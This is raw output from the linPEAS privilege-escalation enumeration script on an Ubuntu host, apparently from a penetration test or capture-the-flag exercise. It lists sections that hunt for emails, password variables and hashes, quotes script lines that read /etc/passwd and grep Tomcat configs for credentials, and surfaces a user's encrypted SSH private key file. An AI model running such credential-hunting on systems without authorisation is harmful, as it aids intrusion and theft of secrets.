/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:35 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
/var/log/dpkg.log:2017-08-01 11:17:36 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/dpkg.log:2017-08-01 11:17:36 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
/var/log/installer/status:Description: Set up users and passwords
[+] Finding emails inside logs (limit 70)
58 /var/log/installer/status:[email protected]
28 /var/log/installer/status:[email protected]
17 /var/log/installer/status:[email protected]
4 /var/log/bootstrap.log:[email protected]
[+] Finding *password* or *credential* files in home (limit 70)
[+] Finding 'pwd' or 'passw' variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/etc/acpi/powerbtn.sh: userhome=`getent passwd $user | cut -d: -f6`
/etc/bash_completion.d/grub:__grub_mkpasswd_pbkdf2_program="grub-mkpasswd-pbkdf2"
/etc/nsswitch.conf:passwd: compat
/etc/samba/smb.conf.bak: passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf.bak: passwd program = /usr/bin/passwd %u
/etc/security/namespace.init: gid=$(echo "$passwd" | cut -f4 -d":")
/etc/security/namespace.init: homedir=$(echo "$passwd" | cut -f6 -d":")
/etc/security/namespace.init: passwd=$(getent passwd "$user")
/tmp/linpeas.sh: SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1`
[+] Finding possible password variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
[+] Finding 'username' string inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/tmp/linpeas.sh: for f in $tomcat; do grep "username=" $f 2>/dev/null | grep "password=" | sed "s,.*,${C}[1;31m&${C}[0m,"; done
[+] Looking for specific hashes inside files - less false positives (limit 70)
[+] Looking for md5/sha1/sha256/sha512 hashes inside files (limit 50)
/etc/java-8-openjdk/security/blacklisted.certs:14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD
/etc/grub.d/05_debian_theme:648ee65dd0c157a69b019a5372cbcfea4fc754a5
/etc/machine-id:a59c744e2166cb4a90376b2f5ad6279f
/etc/popularity-contest.conf:"381d9c0601344d33897a7a5a7f8815c0"
/home/kay/.ssh/id_rsa:,6ABA7DE35CDB65070B92C1F760E2FE75